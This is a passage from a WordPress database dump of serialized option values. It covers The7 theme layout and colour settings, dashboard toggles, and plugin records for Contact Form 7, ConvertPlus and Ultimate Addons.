30px\";s:24:\"header-mobile-decoration\";s:6:\"shadow\";s:30:\"header-mobile-decoration-color\";s:7:\"#ffffff\";s:34:\"header-mobile-decoration-line_size\";s:3:\"1px\";s:32:\"header-mobile-first_switch-after\";s:6:\"1100px\";s:33:\"header-mobile-first_switch-height\";s:4:\"60px\";s:33:\"header-mobile-first_switch-layout\";s:10:\"right_left\";s:31:\"header-mobile-first_switch-logo\";s:6:\"mobile\";s:39:\"header-mobile-first_switch-side-padding\";s:9:\"50px 50px\";s:31:\"header-mobile-floating-bg-color\";s:4:\"#fff\";s:33:\"header-mobile-floating_navigation\";s:6:\"sticky\";s:29:\"header-mobile-header-bg-color\";s:19:\"rgba(255,255,255,1)\";s:24:\"header-mobile-menu-align\";s:5:\"right\";s:27:\"header-mobile-menu-bg-color\";s:19:\"rgba(255,255,255,1)\";s:27:\"header-mobile-menu-bg-width\";s:5:\"340px\";s:37:\"header-mobile-menu-close_icon-caption\";s:8:\"disabled\";s:42:\"header-mobile-menu-close_icon-caption-text\";s:4:\"Menu\";s:48:\"header-mobile-menu-close_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:41:\"header-mobile-menu-close_icon-caption_gap\";s:4:\"10px\";s:38:\"header-mobile-menu-close_icon-position\";s:5:\"right\";s:34:\"header-mobile-menu-close_icon-size\";s:11:\"fade_medium\";s:33:\"header-mobile-menu-dividers-color\";s:19:\"rgba(51,51,51,0.12)\";s:34:\"header-mobile-menu-dividers-height\";s:3:\"1px\";s:29:\"header-mobile-menu-font-color\";s:7:\"#333333\";s:35:\"header-mobile-menu-font-hover-color\";s:7:\"#3c3e45\";s:41:\"header-mobile-menu-font-hover-color-style\";s:6:\"accent\";s:38:\"header-mobile-menu-font-hover-gradient\";s:30:\"90deg|#b78ce2 30%|#1e73be 100%\";s:32:\"header-mobile-menu-show_dividers\";s:1:\"1\";s:29:\"header-mobile-menu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:9:\"uppercase\";s:9:\"font_size\";s:2:\"16\";}s:38:\"header-mobile-menu_close-caption_color\";s:4:\"#fff\";s:44:\"header-mobile-menu_close-caption_color-hover\";s:4:\"#fff\";s:32:\"header-mobile-menu_close_icon-bg\";s:7:\"enabled\";s:46:\"header-mobile-menu_close_icon-bg-border-radius\";s:3:\"0px\";s:45:\"header-mobile-menu_close_icon-bg-border-width\";s:3:\"0px\";s:38:\"header-mobile-menu_close_icon-bg-color\";s:0:\"\";s:38:\"header-mobile-menu_close_icon-bg-hover\";s:7:\"enabled\";s:36:\"header-mobile-menu_close_icon-border\";s:8:\"disabled\";s:42:\"header-mobile-menu_close_icon-border-color\";s:0:\"\";s:48:\"header-mobile-menu_close_icon-border-color-hover\";s:0:\"\";s:42:\"header-mobile-menu_close_icon-border-hover\";s:8:\"disabled\";s:35:\"header-mobile-menu_close_icon-color\";s:4:\"#fff\";s:41:\"header-mobile-menu_close_icon-hover-color\";s:4:\"#fff\";s:36:\"header-mobile-menu_close_icon-margin\";s:16:\"15px 0px 0px 0px\";s:37:\"header-mobile-menu_close_icon-padding\";s:15:\"5px 5px 5px 5px\";s:40:\"header-mobile-menu_icon-bg-border-radius\";s:3:\"0px\";s:39:\"header-mobile-menu_icon-bg-border-width\";s:3:\"0px\";s:32:\"header-mobile-menu_icon-bg-color\";s:19:\"rgba(255,255,255,0)\";s:38:\"header-mobile-menu_icon-bg-color-hover\";s:19:\"rgba(255,255,255,0)\";s:33:\"header-mobile-menu_icon-bg-enable\";s:1:\"0\";s:32:\"header-mobile-menu_icon-bg-hover\";s:1:\"0\";s:30:\"header-mobile-menu_icon-border\";s:8:\"disabled\";s:36:\"header-mobile-menu_icon-border-color\";s:0:\"\";s:36:\"header-mobile-menu_icon-border-hover\";s:8:\"disabled\";s:42:\"header-mobile-menu_icon-border-hover-color\";s:0:\"\";s:31:\"header-mobile-menu_icon-caption\";s:8:\"disabled\";s:39:\"header-mobile-menu_icon-caption-padding\";s:15:\"4px 1px 4px 1px\";s:36:\"header-mobile-menu_icon-caption-text\";s:4:\"Menu\";s:42:\"header-mobile-menu_icon-caption-typography\";a:3:{s:11:\"font_family\";s:5:\"Arial\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:37:\"header-mobile-menu_icon-caption_color\";s:7:\"#333333\";s:43:\"header-mobile-menu_icon-caption_color-hover\";s:7:\"#333333\";s:35:\"header-mobile-menu_icon-caption_gap\";s:4:\"10px\";s:29:\"header-mobile-menu_icon-color\";s:7:\"#333333\";s:35:\"header-mobile-menu_icon-color-hover\";s:7:\"#333333\";s:38:\"header-mobile-menu_icon-hover-bg-color\";s:0:\"\";s:30:\"header-mobile-menu_icon-margin\";s:15:\"0px 0px 0px 0px\";s:28:\"header-mobile-menu_icon-size\";s:5:\"small\";s:44:\"header-mobile-microwidgets-custom-icon-color\";s:0:\"\";s:43:\"header-mobile-microwidgets-custom-icon-size\";s:2:\"16\";s:37:\"header-mobile-microwidgets-font-color\";s:7:\"#333333\";s:37:\"header-mobile-microwidgets-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-mobile-overlay-bg-color\";s:15:\"rgba(0,0,0,0.5)\";s:33:\"header-mobile-second_switch-after\";s:5:\"778px\";s:34:\"header-mobile-second_switch-height\";s:4:\"60px\";s:34:\"header-mobile-second_switch-layout\";s:10:\"right_left\";s:32:\"header-mobile-second_switch-logo\";s:6:\"mobile\";s:40:\"header-mobile-second_switch-side-padding\";s:9:\"20px 20px\";s:32:\"header-mobile-submenu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-overlay-content-padding\";s:15:\"0px 0px 0px 0px\";s:31:\"header-overlay-content-position\";s:6:\"center\";s:28:\"header-overlay-content-width\";s:5:\"300px\";s:28:\"header-overlay-logo-position\";s:12:\"fully_inside\";s:35:\"header-overlay-menu-items_alignment\";s:6:\"center\";s:30:\"header-overlay-menu-items_link\";s:9:\"fullwidth\";s:28:\"header-overlay-menu-position\";s:8:\"v_center\";s:31:\"header-show_floating_navigation\";s:1:\"1\";s:27:\"header-side-content-padding\";s:17:\"50px 0px 40px 0px\";s:20:\"header-side-elements\";a:1:{s:10:\"below_menu\";a:3:{i:0;s:12:\"social_icons\";i:1;s:5:\"email\";i:2;s:5:\"phone\";}}s:39:\"header-side-elements-below_menu-padding\";s:17:\"0px 35px 0px 35px\";s:48:\"header-side-elements-near_menu-custom-icon-color\";s:0:\"\";s:47:\"header-side-elements-near_menu-custom-icon-size\";s:2:\"16\";s:41:\"header-side-elements-near_menu-font_color\";s:7:\"#333333\";s:41:\"header-side-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:20:\"Roboto Condensed:700\";s:9:\"font_size\";s:2:\"14\";}s:25:\"header-side-logo-position\";s:6:\"inside\";s:32:\"header-side-menu-items_alignment\";s:6:\"center\";s:27:\"header-side-menu-items_link\";s:9:\"fullwidth\";s:25:\"header-side-menu-position\";s:5:\"v_top\";s:33:\"header-side-menu-submenu-position\";s:4:\"down\";s:20:\"header-side-position\";s:5:\"right\";s:25:\"header-side-show_elements\";s:1:\"1\";s:17:\"header-side-width\";s:5:\"300px\";s:25:\"header-side_line-elements\";a:1:{s:10:\"below_menu\";a:3:{i:0;s:12:\"social_icons\";i:1;s:6:\"search\";i:2;s:5:\"phone\";}}s:44:\"header-side_line-elements-below_menu-padding\";s:16:\"30px 0px 0px 0px\";s:53:\"header-side_line-elements-near_menu-custom-icon-color\";s:0:\"\";s:52:\"header-side_line-elements-near_menu-custom-icon-size\";s:2:\"16\";s:46:\"header-side_line-elements-near_menu-font_color\";s:7:\"#333333\";s:46:\"header-side_line-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"14\";}s:30:\"header-side_line-show_elements\";s:1:\"1\";s:22:\"header-side_line-width\";s:4:\"60px\";s:32:\"header-slide_out-content-padding\";s:17:\"50px 0px 50px 0px\";s:30:\"header-slide_out-logo-position\";s:12:\"fully_inside\";s:37:\"header-slide_out-menu-items_alignment\";s:6:\"center\";s:32:\"header-slide_out-menu-items_link\";s:9:\"fullwidth\";s:30:\"header-slide_out-menu-position\";s:5:\"v_top\";s:34:\"header-slide_out-overlay-animation\";s:4:\"fade\";s:33:\"header-slide_out-overlay-bg-color\";s:19:\"rgba(221,51,51,0.7)\";s:39:\"header-slide_out-overlay-bg-color-style\";s:6:\"accent\";s:36:\"header-slide_out-overlay-bg-gradient\";s:58:\"135deg|rgba(205,183,226,0.7) 30%|rgba(130,20,130,0.7) 100%\";s:35:\"header-slide_out-overlay-bg-opacity\";s:2:\"70\";s:25:\"header-slide_out-position\";s:4:\"left\";s:22:\"header-slide_out-width\";s:5:\"400px\";s:21:\"header-split-elements\";a:1:{s:14:\"near_menu_left\";a:1:{i:0;s:6:\"search\";}}s:49:\"header-split-elements-near_menu-custom-icon-color\";s:0:\"\";s:48:\"header-split-elements-near_menu-custom-icon-size\";s:2:\"16\";s:42:\"header-split-elements-near_menu-font_color\";s:7:\"#333333\";s:42:\"header-split-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"13\";}s:44:\"header-split-elements-near_menu_left-padding\";s:17:\"0px 20px 0px 20px\";s:45:\"header-split-elements-near_menu_right-padding\";s:17:\"0px 20px 0px 20px\";s:19:\"header-split-height\";s:5:\"100px\";s:25:\"header-split-is_fullwidth\";s:1:\"0\";s:26:\"header-split-menu-position\";s:7:\"outside\";s:26:\"header-split-show_elements\";s:1:\"1\";s:25:\"header-split-side-padding\";s:9:\"30px 30px\";s:28:\"header-split-switch_paddings\";s:3:\"0px\";s:28:\"header-split_mobile_paddings\";s:7:\"0px 0px\";s:33:\"header-style-floating-choose_logo\";s:4:\"none\";s:34:\"header-style-floating-logo-padding\";s:15:\"0px 0px 0px 0px\";s:29:\"header-style-floating-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:34:\"header-style-floating-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:41:\"header-style-floating-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:36:\"header-style-floating-mobile-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:41:\"header-style-floating-mobile-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:31:\"header-style-mixed-logo-padding\";s:15:\"0px 0px 0px 0px\";s:26:\"header-style-mixed-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:31:\"header-style-mixed-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:48:\"header-style-mixed-top_line-floating-choose_logo\";s:4:\"main\";s:49:\"header-style-mixed-top_line-floating-logo-padding\";s:15:\"0px 0px 0px 0px\";s:44:\"header-style-mixed-top_line-floating-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:49:\"header-style-mixed-top_line-floating-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:51:\"header-style-mixed-transparent-top_line-choose_logo\";s:4:\"main\";s:52:\"header-style-mixed-transparent-top_line-logo-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-style-mixed-transparent-top_line-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:52:\"header-style-mixed-transparent-top_line-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:32:\"header-style-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:27:\"header-style-mobile-logo_hd\";a:2:{i:0;s:40:\"/wp-content/uploads/2022/10/mlogo-82.jpg\";i:1;i:2626;}s:32:\"header-style-mobile-logo_regular\";a:2:{i:0;s:42:\"/wp-content/uploads/2022/10/mlogo-82-2.jpg\";i:1;i:2628;}s:36:\"header-style-transparent-choose_logo\";s:6:\"custom\";s:37:\"header-style-transparent-logo-padding\";s:15:\"0px 0px 0px 0px\";s:32:\"header-style-transparent-logo_hd\";a:2:{i:0;s:51:\"/wp-content/uploads/2023/06/remote_sensing_logo.png\";i:1;i:4959;}s:37:\"header-style-transparent-logo_regular\";a:2:{i:0;s:51:\"/wp-content/uploads/2023/06/remote_sensing_logo.png\";i:1;i:4959;}s:44:\"header-style-transparent-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:39:\"header-style-transparent-mobile-logo_hd\";a:2:{i:0;s:51:\"/wp-content/uploads/2023/06/remote_sensing_logo.png\";i:1;i:4959;}s:44:\"header-style-transparent-mobile-logo_regular\";a:2:{i:0;s:51:\"/wp-content/uploads/2023/06/remote_sensing_logo.png\";i:1;i:4959;}s:24:\"header-top_line-elements\";a:1:{s:14:\"top_line_right\";a:3:{i:0;s:6:\"search\";i:1;s:5:\"phone\";i:2;s:12:\"social_icons\";}}s:43:\"header-top_line-elements-below_menu-padding\";s:16:\"35px 0px 0px 0px\";s:54:\"header-top_line-elements-in_top_line-custom-icon-color\";s:0:\"\";s:53:\"header-top_line-elements-in_top_line-custom-icon-size\";s:2:\"16\";s:47:\"header-top_line-elements-in_top_line-font_color\";s:7:\"#333333\";s:47:\"header-top_line-elements-in_top_line-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:52:\"header-top_line-elements-near_menu-custom-icon-color\";s:0:\"\";s:51:\"header-top_line-elements-near_menu-custom-icon-size\";s:2:\"16\";s:45:\"header-top_line-elements-near_menu-font_color\";s:7:\"#333333\";s:45:\"header-top_line-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"13\";}s:41:\"header-top_line-elements-top_line-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-top_line-elements-top_line_right-padding\";s:15:\"0px 0px 0px 0px\";s:29:\"header-top_line-show_elements\";s:1:\"1\";s:28:\"header-top_line-side-padding\";s:9:\"30px 30px\";s:31:\"header-top_line-switch_paddings\";s:3:\"0px\";s:31:\"header-top_line_mobile_paddings\";s:7:\"0px 0px\";s:43:\"header-transparent-mobile-first_switch-logo\";s:6:\"mobile\";s:44:\"header-transparent-mobile-second_switch-logo\";s:6:\"mobile\";s:27:\"header-transparent_bg_color\";s:18:\"rgba(238,238,34,1)\";s:17:\"header_navigation\";s:9:\"slide_out\";s:17:\"image_hover-color\";s:21:\"rgba(255,255,255,0.2)\";s:26:\"image_hover-color_gradient\";s:58:\"135deg|rgba(106,229,230,0.2) 30%|rgba(17,144,201,0.2) 100%\";s:22:\"image_hover-color_mode\";s:5:\"color\";s:19:\"image_hover-opacity\";s:2:\"20\";s:34:\"image_hover-project_rollover_color\";s:21:\"rgba(53,130,222,0.85)\";s:43:\"image_hover-project_rollover_color_gradient\";s:60:\"135deg|rgba(106,229,230,0.85) 30%|rgba(17,144,201,0.85) 100%\";s:39:\"image_hover-project_rollover_color_mode\";s:5:\"color\";s:36:\"image_hover-project_rollover_opacity\";s:2:\"85\";s:17:\"image_hover-style\";s:4:\"none\";s:14:\"input_bg_color\";s:19:\"rgba(252,252,252,1)\";s:18:\"input_border_color\";s:19:\"rgba(51,51,51,0.12)\";s:19:\"input_border_radius\";s:3:\"4px\";s:18:\"input_border_width\";s:15:\"1px 1px 1px 1px\";s:11:\"input_color\";s:7:\"#85868c\";s:12:\"input_height\";s:4:\"38px\";s:13:\"input_padding\";s:17:\"5px 15px 5px 15px\";s:25:\"layout-menu_icon-position\";s:15:\"menu_icon_right\";s:35:\"layout-menu_icon-show_floating_logo\";s:1:\"1\";s:22:\"layout-top_line-height\";s:4:\"74px\";s:28:\"layout-top_line-is_fullwidth\";s:1:\"1\";s:25:\"layout-top_line-is_sticky\";s:1:\"1\";s:29:\"layout-top_line-logo-position\";s:4:\"left\";s:42:\"menu-mobile-microwidgets-custom-icon-color\";s:0:\"\";s:41:\"menu-mobile-microwidgets-custom-icon-size\";s:2:\"16\";s:35:\"menu-mobile-microwidgets-font-color\";s:7:\"#333333\";s:35:\"menu-mobile-microwidgets-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"13\";}s:16:\"message_bg_color\";s:0:\"\";s:13:\"message_color\";s:7:\"#ffffff\";s:32:\"microwidgets-search-active-width\";s:5:\"200px\";s:26:\"microwidgets-search-height\";s:4:\"34px\";s:30:\"microwidgets-search-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"14\";}s:25:\"microwidgets-search-width\";s:5:\"200px\";s:35:\"microwidgets-search_bg-border-color\";s:7:\"#e2e2e2\";s:28:\"microwidgets-search_bg-color\";s:7:\"#f4f4f4\";s:36:\"microwidgets-search_bg_border_radius\";s:3:\"0px\";s:35:\"microwidgets-search_bg_border_width\";s:3:\"0px\";s:31:\"microwidgets-search_custom-icon\";s:24:\"the7-mw-icon-search-bold\";s:30:\"microwidgets-search_font-color\";s:7:\"#aaaaaa\";s:24:\"microwidgets-search_icon\";s:6:\"custom\";s:29:\"microwidgets-search_icon-size\";s:2:\"16\";s:33:\"microwidgets-search_input-padding\";s:9:\"12px 12px\";s:30:\"microwidgets-search_overlay-bg\";s:5:\"color\";s:36:\"microwidgets-search_overlay-bg-color\";s:15:\"rgba(0,0,0,0.9)\";s:39:\"microwidgets-search_overlay-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:25:\"microwidgets-search_style\";s:5:\"popup\";s:52:\"page_title-background-style-transparent-color_scheme\";s:5:\"light\";s:18:\"page_title-padding\";s:9:\"20px 20px\";s:30:\"portfolio-rel_projects_columns\";a:6:{s:12:\"wide_desktop\";i:4;s:7:\"desktop\";i:3;s:6:\"laptop\";i:3;s:8:\"h_tablet\";i:3;s:8:\"v_tablet\";i:2;s:5:\"phone\";i:1;}s:34:\"portfolio-rel_projects_proportions\";a:2:{s:5:\"width\";i:1;s:6:\"height\";i:1;}s:26:\"post-show_fancy_categories\";s:1:\"1\";s:20:\"post-show_fancy_date\";s:1:\"1\";s:6:\"preset\";s:7:\"skin12r\";s:33:\"show_static_part_of_archive_title\";s:1:\"1\";s:16:\"sidebar-bg_color\";s:16:\"rgba(0,0,0,0.04)\";s:16:\"sidebar-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:18:\"sidebar-decoration\";s:4:\"none\";s:32:\"sidebar-decoration_outline_color\";s:16:\"rgba(0,0,0,0.06)\";s:27:\"sidebar-distance_to_content\";s:4:\"50px\";s:26:\"sidebar-divider-horizontal\";s:1:\"1\";s:24:\"sidebar-divider-vertical\";s:1:\"1\";s:16:\"sidebar-floating\";b:0;s:21:\"sidebar-headers_color\";s:7:\"#333333\";s:26:\"sidebar-primary_text_color\";s:7:\"#85868c\";s:22:\"sidebar-responsiveness\";s:5:\"992px\";s:25:\"sidebar-vertical_distance\";s:4:\"20px\";s:20:\"sidebar-visual_style\";s:15:\"with_widgets_bg\";s:13:\"sidebar-width\";s:5:\"350px\";s:19:\"social_buttons-page\";a:0:{}s:32:\"social_buttons-page-button_title\";s:15:\"Share this page\";s:20:\"social_buttons-photo\";a:0:{}s:33:\"social_buttons-photo-button_title\";s:16:\"Share This Image\";s:29:\"social_buttons-portfolio_post\";a:0:{}s:42:\"social_buttons-portfolio_post-button_title\";s:0:\"\";s:19:\"social_buttons-post\";a:0:{}s:32:\"social_buttons-post-button_title\";s:0:\"\";s:25:\"social_buttons-visibility\";s:8:\"on_hover\";s:25:\"stripes-stripe_1_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_1_color\";s:7:\"#f4f4f5\";s:39:\"stripes-stripe_1_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_1_content_boxes_bg_opacity\";s:3:\"100\";s:41:\"stripes-stripe_1_content_boxes_decoration\";s:4:\"none\";s:55:\"stripes-stripe_1_content_boxes_decoration_outline_color\";s:7:\"#dd3333\";s:57:\"stripes-stripe_1_content_boxes_decoration_outline_opacity\";s:3:\"100\";s:30:\"stripes-stripe_1_headers_color\";s:7:\"#3c3e45\";s:24:\"stripes-stripe_1_outline\";s:4:\"hide\";s:30:\"stripes-stripe_1_outline_color\";s:7:\"#44bb70\";s:32:\"stripes-stripe_1_outline_opacity\";s:3:\"100\";s:27:\"stripes-stripe_1_text_color\";s:7:\"#72777d\";s:25:\"stripes-stripe_2_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_2_color\";s:7:\"#23242a\";s:39:\"stripes-stripe_2_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_2_content_boxes_bg_opacity\";s:1:\"0\";s:41:\"stripes-stripe_2_content_boxes_decoration\";s:7:\"outline\";s:55:\"stripes-stripe_2_content_boxes_decoration_outline_color\";s:7:\"#f4f4f5\";s:57:\"stripes-stripe_2_content_boxes_decoration_outline_opacity\";s:2:\"18\";s:30:\"stripes-stripe_2_headers_color\";s:7:\"#f4f4f5\";s:24:\"stripes-stripe_2_outline\";s:4:\"hide\";s:30:\"stripes-stripe_2_outline_color\";s:7:\"#c1edaf\";s:32:\"stripes-stripe_2_outline_opacity\";s:3:\"100\";s:27:\"stripes-stripe_2_text_color\";s:7:\"#f4f4f5\";s:25:\"stripes-stripe_3_bg_image\";a:4:{s:5:\"image\";s:62:\"/inc/presets/images/full/skin12r.stripes-stripe-3-bg-image.jpg\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_3_color\";s:7:\"#235696\";s:39:\"stripes-stripe_3_content_boxes_bg_color\";s:7:\"#235696\";s:41:\"stripes-stripe_3_content_boxes_bg_opacity\";s:1:\"0\";s:41:\"stripes-stripe_3_content_boxes_decoration\";s:7:\"outline\";s:55:\"stripes-stripe_3_content_boxes_decoration_outline_color\";s:7:\"#ffffff\";s:57:\"stripes-stripe_3_content_boxes_decoration_outline_opacity\";s:2:\"30\";s:30:\"stripes-stripe_3_headers_color\";s:7:\"#ffffff\";s:24:\"stripes-stripe_3_outline\";s:4:\"hide\";s:30:\"stripes-stripe_3_outline_color\";s:7:\"#FFFFFF\";s:32:\"stripes-stripe_3_outline_opacity\";s:3:\"100\";s:27:\"stripes-stripe_3_text_color\";s:7:\"#ffffff\";s:20:\"template_page_id_404\";i:0;s:23:\"template_page_id_author\";i:51;s:36:\"template_page_id_author_full_content\";s:1:\"0\";s:30:\"template_page_id_blog_category\";i:51;s:43:\"template_page_id_blog_category_full_content\";s:1:\"0\";s:26:\"template_page_id_blog_tags\";i:51;s:39:\"template_page_id_blog_tags_full_content\";s:1:\"0\";s:21:\"template_page_id_date\";i:51;s:34:\"template_page_id_date_full_content\";s:1:\"0\";s:35:\"template_page_id_portfolio_category\";i:51;s:23:\"template_page_id_search\";i:0;s:36:\"template_page_id_search_full_content\";s:1:\"0\";s:19:\"the7_opengraph_tags\";s:1:\"1\";s:14:\"top-bar-height\";s:5:\"200px\";s:28:\"top-bar-transparent_bg_color\";s:15:\"rgba(0,0,0,0.5)\";s:16:\"top_bar-bg-color\";s:7:\"#3b8ced\";s:16:\"top_bar-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:16:\"top_bar-bg-style\";s:8:\"disabled\";s:25:\"top_bar-custom-icon-color\";s:0:\"\";s:24:\"top_bar-custom-icon-size\";s:2:\"16\";s:18:\"top_bar-font-color\";s:7:\"#ffffff\";s:18:\"top_bar-line-color\";s:22:\"rgba(255,255,255,0.12)\";s:34:\"top_bar-line-in-transparent-header\";b:0;s:17:\"top_bar-line_size\";s:3:\"1px\";s:18:\"top_bar-line_style\";s:5:\"solid\";s:15:\"top_bar-padding\";s:17:\"3px 50px 3px 50px\";s:23:\"top_bar-switch_paddings\";s:5:\"778px\";s:18:\"top_bar-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:23:\"top_bar_mobile_paddings\";s:17:\"3px 20px 3px 20px\";s:10:\"widget_gap\";s:4:\"20px\";s:11:\"widgetareas\";a:2:{i:1;a:2:{s:12:\"sidebar_name\";s:15:\"Default Sidebar\";s:12:\"sidebar_desc\";s:27:\"Sidebar primary widget area\";}i:2;a:2:{s:12:\"sidebar_name\";s:14:\"Default Footer\";s:12:\"sidebar_desc\";s:26:\"Footer primary widget area\";}}s:23:\"woocommerce_steps_color\";s:7:\"#333333\";}','yes'),
(186,'the7_dashboard_settings','a:32:{s:15:\"settings-preset\";s:6:\"custom\";s:14:\"db-auto-update\";b:1;s:9:\"mega-menu\";b:1;s:15:\"critical-alerts\";b:1;s:22:\"web-fonts-display-swap\";b:0;s:29:\"elementor-buttons-integration\";b:0;s:21:\"elementor-theme-style\";b:0;s:29:\"elementor-theme-style-migrate\";s:10:\"do_nothing\";s:24:\"disable-gutenberg-styles\";b:0;s:37:\"elementor-zero-paragraph-last-spacing\";b:0;s:21:\"critical-alerts-email\";s:0:\"\";s:27:\"fontawesome-4-compatibility\";b:0;s:18:\"options-in-sidebar\";b:0;s:28:\"deprecated_elementor_widgets\";b:0;s:24:\"the7-icons-for-elementor\";b:0;s:31:\"legacy-elementor-theme-features\";b:0;s:4:\"rows\";b:0;s:19:\"overlapping-headers\";b:0;s:29:\"deprecated_mega_menu_settings\";b:1;s:16:\"portfolio-layout\";b:0;s:15:\"admin-icons-bar\";b:0;s:9:\"portfolio\";b:1;s:14:\"portfolio-slug\";s:7:\"project\";s:26:\"portfolio-breadcrumbs-text\";s:0:\"\";s:12:\"testimonials\";b:1;s:4:\"team\";b:1;s:9:\"team-slug\";s:7:\"dt_team\";s:5:\"logos\";b:0;s:8:\"benefits\";b:0;s:6:\"albums\";b:1;s:11:\"albums-slug\";s:10:\"dt_gallery\";s:9:\"slideshow\";b:1;}','yes'),
(187,'wpcf7','a:2:{s:7:\"version\";s:7:\"5.7.5.1\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1664832885;s:7:\"version\";s:5:\"5.6.3\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),
(188,'cp_previous_version','3.5.24','yes'),
(189,'convert_plug_modules','a:3:{i:0;s:11:\"Modal_Popup\";i:1;s:8:\"Info_Bar\";i:2;s:14:\"Slide_In_Popup\";}','yes'),
(190,'convert_plug_redirect','','yes'),
(191,'bsf_force_check_extensions','','no'),
(192,'widget_convertplug_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(193,'bsf-updater-version','1.27.15','yes'),
(194,'brainstrom_products','a:1:{s:7:\"plugins\";a:2:{i:14058953;a:32:{s:2:\"id\";s:8:\"14058953\";s:4:\"name\";s:11:\"ConvertPlus\";s:4:\"slug\";s:11:\"convertplug\";s:10:\"short_name\";s:0:\"\";s:11:\"description\";s:57:\"Transform your website into a lead generation powerhouse.\";s:7:\"version\";s:6:\"3.5.24\";s:12:\"download_url\";s:0:\"\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";s:6:\"tested\";s:5:\"5.8.1\";s:14:\"privacy_policy\";s:132:\"https://store.brainstormforce.com/privacy-policy/?utm_source=license-form&utm_medium=privacy-policy&utm_campaign=graupi-license-form\";s:16:\"terms_conditions\";s:144:\"https://store.brainstormforce.com/terms-and-conditions/?utm_source=license-form&utm_medium=terms-and-conditions&utm_campaign=graupi-license-form\";s:12:\"purchase_url\";s:75:\"https://codecanyon.net/cart/add_items?item_ids=14058953&ref=BrainstormForce\";s:13:\"changelog_url\";s:43:\"https://www.convertplug.com/plus/changelog/\";s:4:\"type\";s:6:\"plugin\";s:8:\"in_house\";s:4:\"true\";s:9:\"on_market\";s:4:\"true\";s:15:\"is_product_free\";s:5:\"false\";s:14:\"has-extensions\";s:4:\"true\";s:13:\"support_forum\";s:36:\"http://brainstormforce.freshdesk.com\";s:25:\"after_registration_action\";s:38:\"admin.php?page=bsf-extensions-14058953\";s:13:\"product_image\";s:73:\"//support.brainstormforce.com/wp-content/uploads/2016/03/Convert-Plug.png\";s:32:\"show_on_register_licence_listing\";s:4:\"true\";s:15:\"show_on_listing\";s:4:\"true\";s:13:\"is_support_on\";s:4:\"true\";s:14:\"envato_item_id\";s:8:\"14058953\";s:8:\"template\";s:27:\"convertplug/convertplug.php\";s:6:\"remote\";s:6:\"3.5.24\";s:12:\"purchase_key\";s:0:\"\";s:6:\"status\";s:14:\"not-registered\";s:7:\"message\";s:0:\"\";s:12:\"product_name\";s:12:\"Convert Plus\";}i:6892199;a:32:{s:2:\"id\";s:7:\"6892199\";s:4:\"name\";s:41:\"Ultimate Addons for WPBakery Page Builder\";s:4:\"slug\";s:18:\"Ultimate_VC_Addons\";s:10:\"short_name\";s:0:\"\";s:11:\"description\";s:153:\"The top seller new plugin of 2016. Install Ultimate with WPBakery Page Builder and you will probably have everything you need to build stunning 